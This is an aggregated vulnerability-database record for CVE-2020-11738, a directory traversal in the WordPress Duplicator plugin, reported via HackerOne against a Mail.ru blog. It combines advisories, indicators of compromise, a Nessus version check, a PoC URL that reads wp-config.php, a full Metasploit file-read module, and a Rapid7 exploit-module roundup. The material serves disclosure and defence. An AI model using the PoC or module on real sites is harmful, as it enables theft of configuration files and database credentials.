{"id": "H1:1021010", "type": "hackerone", "bulletinFamily": "bugbounty", "title": "Mail.ru: \"blog.skillfactory.ru\" Vulnerable to Directory Traversal ", "description": "CVE-2020-11738 on blog.skillfactory.ru", "published": "2020-10-28T15:57:54", "modified": "2021-04-06T12:40:10", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://hackerone.com/reports/1021010", "reporter": "gevakun", "references": [], "cvelist": ["CVE-2020-11738"], "immutableFields": [], "lastseen": "2021-04-14T10:28:47", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:7B975634-2048-4113-92B7-D2E74D1CEE74"]}, {"type": "cve", "idList": ["CVE-2020-11738"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_DUPLICATOR_1_3_28.NASL"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:35227C3A-E893-4C68-8CB6-FFE79115FB6D"]}, {"type": "wpexploit", "idList": ["WPEX-ID:35227C3A-E893-4C68-8CB6-FFE79115FB6D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160621"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5482AC1594C82A230828023816657B57"]}], "modified": "2021-04-14T10:28:47", "rev": 2}, "score": {"value": 5.5, "vector": "NONE", "modified": "2021-04-14T10:28:47", "rev": 2}, "vulnersScore": 5.5}, "bounty": 250.0, "bountyState": "resolved", "h1team": {"url": "https://hackerone.com/mailru", "handle": "mailru", "profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/variants/000/000/065/1ec04a6b87b02422d913b5c53d5247de91d64718_original.png/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866", "medium": "https://profile-photos.hackerone-user-content.com/variants/000/000/065/1ec04a6b87b02422d913b5c53d5247de91d64718_original.png/a15c8fdab95ed5efd5f3d61e531298869f767d9203f8ea9df2bac929a5d32138"}}, "h1reporter": {"disabled": false, "username": "gevakun", "url": "/gevakun", "profile_picture_urls": {"small": "https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/variants/iclk9fgt1tmg85jpttx5wtjt3kki/00311c7541dfa131115f58f065f11f090f520e0a33b1f347ea385ca21df6c866?response-content-disposition=inline%3B%20filename%3D%22carlos-quintero--3A4GkgwB-M-unsplash.jpg%22%3B%20filename%2A%3DUTF-8%27%27carlos-quintero--3A4GkgwB-M-unsplash.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQ67CL3UYR%2F20210414%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20210414T102847Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEJL%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLXdlc3QtMiJHMEUCIDH5ldSs%2B76GgS6yEBQriwfJIqgq7n%2Fx9eMGGMvFF6OxAiEA4qvKlatbmKCH6ssQCVk1psE1B3srqFKCUVP86zPe55QqvQMI6%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARABGgwwMTM2MTkyNzQ4NDkiDEQ6zDRRKKIOCRm3OSqRA%2Bvuz7m7ZkQuU3vOe3SH28ZPjfImWnRcvuNFM1AsacM9MHGT9Top21zSxbQVmVP3oK%2Fd4CVjzD5PNrk9LxFhaC5dnr0ephL0HEStqYjt79ZMnopWiccnQAbJl7BOa68Wpd5Ody58jDalrXjprnONmJVLhOxHOa0XvRX3V1qIht9YuwdClnTzpsB2nRg68nW1a4hiy3WMNcdXrYmnMdaEiFQgqKm87pzUWsRTC4mFVQ%2FXTPizoT4Hoi9PlPTnzzNO%2Bq4Y7ABqf3tPCRCx%2FGUBKQNx5VnMIviQ4XdpJIaTM%2FassvhM0oDf3%2Fxwz%2BSAz3v9WJSmoBTPPQLCC586Wt1JpQLh4Hp3rkf3Sk3j0uGhp8Jjk9SfJxs5%2FLD4Onfie3lFFsWkEe3SPXZOZN4FHC94p%2BuPneUbdk00kONkgdDmzDKBxaUrGNm%2B1Ewbszals8C7aMPAfvSwInsM2qwn7TR1VPF3MYjkdTTyLeejNzNaSCT0FUNM7Gs5FUX%2FOPf7dh%2F7V%2BtvMPH4G%2FdXcn8Y2W3Gfy%2B%2BMLnx2oMGOusBE2B0xknJtgHxw%2FO0yRWi46maeLcXVsWjv%2Fm7jJ8vbCqVe8Xv5WiXCa1ZU9w8Trz1OZ4tWVEpXJCaWtrxIguTIseRZOxwvtK9LFg76j8c4Hz%2Fl4ib9i%2BauZ%2BvkyrQHF54hKAWvySOE%2B6g8Is6ONoU%2BfD2DDOKhVQGhW%2BEZs%2FQg7gtH1l38%2B0Jk%2BjEpvsPXWNabNcy3to%2FQ4nwLwGgn0HWo8ZN4DqrXqfqEwBFxArGxiPBLRCEwSGhzU3BoQbJbazEMCe8whHKUdyAdATqo%2FR6jkXC1rZT2l%2FfZzXZ9djbGHqSjoWtCiPhPFUUYg%3D%3D&X-Amz-Signature=e86fa075cf27d5132a3a591e5632639f5d0c3836749c7a825493b72190cd1896"}, "is_me?": false, "cleared": false, "hackerone_triager": false, "hacker_mediation": false}}

{"attackerkb": [{"lastseen": "2020-12-19T00:16:40", "bulletinFamily": "info", "cvelist": ["CVE-2020-11738"], "description": "The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows Directory Traversal via ../ in the file parameter to duplicator_download or duplicator_init.\n\n \n**Recent assessments:** \n \n**kevthehermit** at April 14, 2020 2:38pm UTC reported:\n\nThis plugin is recorded as having over 1 Million installations via Wordpress \u2013 <https://wordpress.org/plugins/duplicator/> \nIt has a free and a pro version with both being impacted.\n\nOther reporting suggests that there are around 170,000 active installations. with ~ 150,000 of these not on the latest version.\n\nThe vulnerability allows arbitrary file read of any file on disk in the context of the web application. This kind of attack _can_ lead to further compromise depending on its setup and configuration. Using this level of access can lead to database credentials being compromised which in turn can lead to further exploitation.\n\nThis exploit has been seen in active campaigns as reported by wordfence \u2013 <https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/>\n\nIOC\u2019s Shared by wordpress and replicated here for ease of discovery.\n\nIndicators Of Compromise (IOCs) \nThe following Indicators of Compromise (IOCs) can be used to determine if your site may have been attacked.\n\nTraffic logged from the threat actor\u2019s IP address should be considered suspicious:\n\n * 77.71.115.52 \n\n * Attacks in this campaign are issued via GET requests with the following query strings: \n\n * action=duplicator_download \n\n * file=/../wp-config.php \n\n * Note: Because this vulnerability can be exploited via WP AJAX, it\u2019s possible to exploit via POST request. In this case, it\u2019s possible for the action parameter to be passed in the POST body instead of the query string. This will prevent the action=duplicator_download string from appearing in HTTP logs. The file parameter must be passed as a query string, however, and is a reliable indicator.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 5\n", "modified": "2020-06-05T00:00:00", "published": "2020-04-13T00:00:00", "id": "AKB:7B975634-2048-4113-92B7-D2E74D1CEE74", "href": "https://attackerkb.com/topics/judia21wRt/cve-2020-11738", "type": "attackerkb", "title": "CVE-2020-11738", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2021-02-02T07:36:56", "description": "The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows Directory Traversal via ../ in the file parameter to duplicator_download or duplicator_init.", "edition": 9, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-04-13T22:15:00", "title": "CVE-2020-11738", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11738"], "modified": "2020-12-18T21:15:00", "cpe": [], "id": "CVE-2020-11738", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-11738", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}], "nessus": [{"lastseen": "2020-09-14T19:32:17", "description": "The WordPress application running on the remote host has a version of\nthe 'Duplicator' plugin that is prior to 1.3.28 and, thus, is\naffected by an unauthenticated arbitrary file download vulnerability that can allow\nthe attackers to download 'wp-config.php' and steal database credentials.", "edition": 8, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2020-02-21T00:00:00", "title": "WordPress Plugin 'Duplicator' < 1.3.28 Unauthenticated Arbitrary File Download", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-11738"], "modified": "2020-02-21T00:00:00", "cpe": ["cpe:/a:wordpress:wordpress"], "id": "WORDPRESS_PLUGIN_DUPLICATOR_1_3_28.NASL", "href": "https://www.tenable.com/plugins/nessus/133846", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133846);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/02\");\n\n script_cve_id(\"CVE-2020-11738\");\n\n script_name(english:\"WordPress Plugin 'Duplicator' < 1.3.28 Unauthenticated Arbitrary File Download\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WordPress application has a plugin installed that is vulnerable\nto unauthenticated arbitrary file download.\");\n script_set_attribute(attribute:\"description\", value:\n\"The WordPress application running on the remote host has a version of\nthe 'Duplicator' plugin that is prior to 1.3.28 and, thus, is\naffected by an unauthenticated arbitrary file download vulnerability that can allow\nthe attackers to download 'wp-config.php' and steal database credentials.\");\n # https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8f2901d0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the 'Duplicator' plugin to version 1.3.28 or greater\nthrough the administrative dashboard.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11738\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_plugin_detect.nbin\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::wordpress::plugin::get_app_info(plugin:'duplicator');\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'min_version': '1.0.0', 'max_version': '1.3.26', 'fixed_version' : '1.3.28' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "wpvulndb": [{"lastseen": "2021-02-15T22:04:18", "bulletinFamily": "software", "cvelist": ["CVE-2020-11738"], "description": "The issue is being actively exploited, and allows attackers to download arbitrary files, such as the wp-config.php file. According to the vendor, the vulnerability was only in two versions v1.3.24 and v1.3.26, the vulnerability wasn't present in versions 1.3.22 and before.\n\n### PoC\n\nhttp://www.example.com/wp-admin/admin-ajax.php?action=duplicator_download&amp;file;=../wp-config.php\n", "modified": "2021-01-04T06:01:37", "id": "WPVDB-ID:35227C3A-E893-4C68-8CB6-FFE79115FB6D", "href": "https://wpscan.com/vulnerability/35227c3a-e893-4c68-8cb6-ffe79115fb6d", "published": "2020-02-19T00:00:00", "type": "wpvulndb", "title": "Duplicator 1.3.24 & 1.3.26 - Unauthenticated Arbitrary File Download", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "wpexploit": [{"lastseen": "2021-02-15T22:04:18", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-11738"], "description": "The issue is being actively exploited, and allows attackers to download arbitrary files, such as the wp-config.php file. According to the vendor, the vulnerability was only in two versions v1.3.24 and v1.3.26, the vulnerability wasn't present in versions 1.3.22 and before.\n", "modified": "2021-01-04T06:01:37", "published": "2020-02-19T00:00:00", "id": "WPEX-ID:35227C3A-E893-4C68-8CB6-FFE79115FB6D", "href": "", "type": "wpexploit", "title": "Duplicator 1.3.24 & 1.3.26 - Unauthenticated Arbitrary File Download", "sourceData": "http://www.example.com/wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2020-12-18T19:23:24", "description": "", "published": "2020-12-18T00:00:00", "type": "packetstorm", "title": "WordPress Duplicator 1.3.26 Directory Traversal / File Read", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-11738"], "modified": "2020-12-18T00:00:00", "id": "PACKETSTORM:160621", "href": "https://packetstormsecurity.com/files/160621/WordPress-Duplicator-1.3.26-Directory-Traversal-File-Read.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Auxiliary::Report \ninclude Msf::Exploit::Remote::HTTP::Wordpress \ninclude Msf::Auxiliary::Scanner \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'WordPress Duplicator File Read Vulnerability', \n'Description' => %q{ This module exploits an unauthenticated directory traversal vulnerability in WordPress plugin 'Duplicator' plugin version 1.3.24-1.3.26, allowing arbitrary file read with the web server privileges. This vulnerability was being actively exploited when it was discovered.}, \n'References' => \n[ \n['CVE', '2020-11738'], \n['WPVDB', '10078'], \n['URL', 'https://snapcreek.com/duplicator/docs/changelog'] \n], \n'Author' => \n[ \n'Ramuel Gall', # Vulnerability discovery \n'Hoa Nguyen - SunCSR Team' # Metasploit module \n], \n'DisclosureDate' => 'Feb 19 2020', \n'License' => MSF_LICENSE \n)) \nregister_options( \n[ \nOptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']), \nOptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 5]) \n]) \nend \ndef check \ncheck_plugin_version_from_readme('duplicator_download','1.3.27', '1.3.24') \nend \ndef run_host(ip) \ntraversal = '../' * datastore['DEPTH'] \nfilename = datastore['FILEPATH'] \nfilename = filename[1, filename.length] if filename =~ /^\\// \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path,'wp-admin', 'admin-ajax.php'), \n'vars_get' => \n{ \n'action' => 'duplicator_download', \n'file' => \"#{traversal}#{filename}\" \n} \n}) \nfail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200 \nfail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero? \nprint_status('Downloading file...') \nprint_line(\"\\n#{res.body}\\n\") \nfname = datastore['FILEPATH'] \npath = store_loot( \n'duplicator.traversal', \n'text/plain', \nip, \nres.body, \nfname \n) \nprint_good(\"File saved in: #{path}\") \nend \nend \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/160621/wpduplicator-traversal.rb.txt"}], "rapid7blog": [{"lastseen": "2021-01-08T22:48:37", "bulletinFamily": "info", "cvelist": ["CVE-2019-0230", "CVE-2020-11698", "CVE-2020-11738", "CVE-2020-17530", "CVE-2020-35234", "CVE-2020-8260"], "description": "## Struts2 Multi Eval OGNL RCE\n\n\n\nOur very own [zeroSteiner](<https://github.com/zeroSteiner>) added [`exploit/multi/http/struts2_multi_eval_ognl`](<https://github.com/rapid7/metasploit-framework/pull/14521>), which exploits Struts2 evaluating OGNL expressions in HTML attributes multiple times ([CVE-2019-0230](<https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230?referrer=blog>) and [CVE-2020-17530](<https://attackerkb.com/topics/LdoHePCiRm/cve-2020-17530?referrer=blog>)). The [CVE-2019-0230](<https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230?referrer=blog>) OGNL chain for remote code execution requires a one-time chain to enable the RCE gadget, which is handled automatically by the module. The OGNL gadget chain for [CVE-2020-17530](<https://attackerkb.com/topics/LdoHePCiRm/cve-2020-17530?referrer=blog>) will echo the command output. Both chains use a simple mathematical expression to ensure that evaluation occurs. These vulnerabilities are application dependent, and the user does need to know which CVE they are targeting. Setting the `NAME` parameter appropriately and using the check method to ensure evaluation takes place inside an HTML attribute are key to successful exploitation.\n\n## JuicyPotato-like Windows privilege escalation exploit\n\nExploit module [`exploits/windows/local/bits_ntlm_token_impersonation`](<https://github.com/rapid7/metasploit-framework/pull/14046>) was added by Metasploit contributor [C4ssandre](<https://github.com/C4ssandre>). It exploits BITS connecting to a local Windows Remote Management server (WinRM) at startup time. A fake WinRM server listening on port `5985` is started by a `DLL` loaded from a previous unprivileged meterpreter session. The fake server triggers BITS and then steals a `SYSTEM` token from the subsequent authentication request. The token is then used to start a new process and launch `powershell.exe` as the `SYSTEM` user. It downloads a malicious PowerShell script and executes it on a second local HTTP server, not writing any files to disk. The exploit is based on [decoder's PoC](<https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/>). It has been successfully tested on Windows 10 (10.0 Build 19041) 32 bits.\n\n## Pulse Connect Secure Gzip RCE\n\nMetasploit contributor [h00die](<https://github.com/h00die>) added an [exploit](<https://github.com/rapid7/metasploit-framework/pull/14368>) that targets Pulse Connect Secure server version `9.1R8` and earlier. The vulnerability was originally discovered by the [NCC Group](<https://research.nccgroup.com/2020/10/26/technical-advisory-pulse-connect-secure-rce-via-uncontrolled-gzip-extraction-cve-2020-8260/>). It achieves authenticated remote code execution as `root` by uploading an encrypted config that contains an overwrite for a Perl template file. This module was made possible by [rxwx](<https://github.com/rxrx>), who shared the encryption code with the author. Admin credentials are required for successful `root` access. The module has been tested against server version `9.1R8`.\n\n## New modules (8)\n\n * [SpamTitan Unauthenticated RCE](<https://github.com/rapid7/metasploit-framework/pull/14330>) by [Christophe De La Fuente](<https://github.com/cdelafuente-r7>) and [Felipe Molina](<https://github.com/felmoltor>), which exploits [CVE-2020-11698](<https://attackerkb.com/topics/ZM17ZOD4ym/cve-2020-11698?referrer=blog>)\n * [Pulse Secure VPN gzip RCE](<https://github.com/rapid7/metasploit-framework/pull/14368>) by [David Cash](<https://research.nccgroup.com/author/dcashncc/>), [Richard Warren](<https://uk.linkedin.com/in/rich-warren-437a7841>), [Spencer McIntyre](<https://github.com/zeroSteiner>), and [h00die](<https://github.com/h00die>), which exploits [CVE-2020-8260](<https://attackerkb.com/topics/MToDzANCY4/cve-2020-8260?referrer=blog>)\n * [Apache Struts 2 Forced Multi OGNL Evaluation](<https://github.com/rapid7/metasploit-framework/pull/14521>) by [Alvaro Mu\u00f1oz](<https://github.com/pwntester>), Matthias Kaiser, [Spencer McIntyre](<https://github.com/zeroSteiner>), and [ka1n4t](<https://github.com/ka1n4t>), which exploits [CVE-2020-17530](<https://attackerkb.com/topics/LdoHePCiRm/cve-2020-17530?referrer=blog>) and [CVE-2019-0230](<https://attackerkb.com/topics/mcp2xl4Va9/cve-2019-0230?referrer=blog>)\n * [SYSTEM token impersonation through NTLM bits authentication on missing WinRM Service.](<https://github.com/rapid7/metasploit-framework/pull/14046>) by Andrea Pierini ([decoder](<https://github.com/decoder>)), Antonio Cocomazzi (splinter_code), [Cassandre](<https://github.com/C4ssandre>), and Roberto ([0xea31](<https://github.com/0xea31>))\n * [Shodan Host Port](<https://github.com/rapid7/metasploit-framework/pull/14429>) by [natto97](<https://github.com/natto97>)\n * [WordPress Duplicator File Read Vulnerability](<https://github.com/rapid7/metasploit-framework/pull/14497>) by Hoa Nguyen - SunCSR Team and Ramuel Gall, which exploits [CVE-2020-11738](<https://attackerkb.com/topics/judia21wRt/cve-2020-11738?referrer=blog>)\n * [WordPress Easy WP SMTP Password Reset](<https://github.com/rapid7/metasploit-framework/pull/14474>) by [h00die](<https://github.com/h00die>), which exploits [CVE-2020-35234](<https://attackerkb.com/topics/12eb7VUXHR/cve-2020-35234?referrer=blog>)\n * [WordPress Total Upkeep Unauthenticated Backup Downloader](<https://github.com/rapid7/metasploit-framework/pull/14568>) by Wadeek and [h00die](<https://github.com/h00die>)\n\n## Enhancements and features\n\n * PR [14566](<https://github.com/rapid7/metasploit-framework/pull/14566>) from [zeroSteiner](<https://github.com/zeroSteiner>) Module `auxiliary/server/socks_proxy` replaces `modules/auxiliary/server/socks4a.rb` and `modules/auxiliary/server/socks5.rb`.\n * PR [14538](<https://github.com/rapid7/metasploit-framework/pull/14538>) from [jmartin-r7](<https://github.com/jmartin-r7>) Improves Metasploit's XML importer error messages when data is not Base64 encoded.\n * PR [14528](<https://github.com/rapid7/metasploit-framework/pull/14528>) from [zeroSteiner](<https://github.com/zeroSteiner>) Clarifies Windows Meterpreter payloads description support of XP SP2 or newer.\n * PR [14522](<https://github.com/rapid7/metasploit-framework/pull/14522>) from [axxop](<https://github.com/axxop>) Replaces the hardcoded default Shiro encryption key with a new datastore option that allows users to specify rememberMe cookie encryption key.\n * PR [14517](<https://github.com/rapid7/metasploit-framework/pull/14517>) from [timwr](<https://github.com/timwr>) Changes the osx/x64/shell_reverse_tcp payload to be generated with Metasm and captures and sends STDERR to msfconsole.\n * PR [14509](<https://github.com/rapid7/metasploit-framework/pull/14509>) from [egypt](<https://github.com/egypt>) This adds a Java target to the Apache Solr RCE exploit module and fixes several payload issues.\n * PR [14444](<https://github.com/rapid7/metasploit-framework/pull/14444>) from [dwelch-r7](<https://github.com/dwelch-r7>) Adds a couple of missing methods from the remote data services for adding and deleting routes.\n\n## Bugs fixed\n\n * PR [14589](<https://github.com/rapid7/metasploit-framework/pull/14589>) from [timwr](<https://github.com/timwr>) Fixes a file download issue with the Android Meterpreter's download command.\n * PR [14532](<https://github.com/rapid7/metasploit-framework/pull/14532>) from [bcoles](<https://github.com/bcoles>) Fixes a NoMethodError exception caused by the Msf::Post::Common mixin not being included in post/android/capture/screen.\n * PR [14530](<https://github.com/rapid7/metasploit-framework/pull/14530>) from [jmartin-r7](<https://github.com/jmartin-r7>) Fixes a failing test on macOS caused by IPv6 vs IPv4 result precedence.\n * PR [14475](<https://github.com/rapid7/metasploit-framework/pull/14475>) from [dwelch-r7](<https://github.com/dwelch-r7>) Fixes the EICAR canary check.\n * PR [14334](<https://github.com/rapid7/metasploit-framework/pull/14334>) from [Summus-git](<https://github.com/Summus-git>) Fixes a x86 linux bind shell payloads socket closing bug.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.22...6.0.25](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-12-17T10%3A49%3A21-06%3A00..2021-01-07T10%3A58%3A16%2B00%3A00%22>)\n * [Full diff 6.0.22...6.0.25](<https://github.com/rapid7/metasploit-framework/compare/6.0.22...6.0.25>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2021-01-08T19:54:36", "published": "2021-01-08T19:54:36", "id": "RAPID7BLOG:5482AC1594C82A230828023816657B57", "href": "https://blog.rapid7.com/2021/01/08/metasploit-wrap-up-93/", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}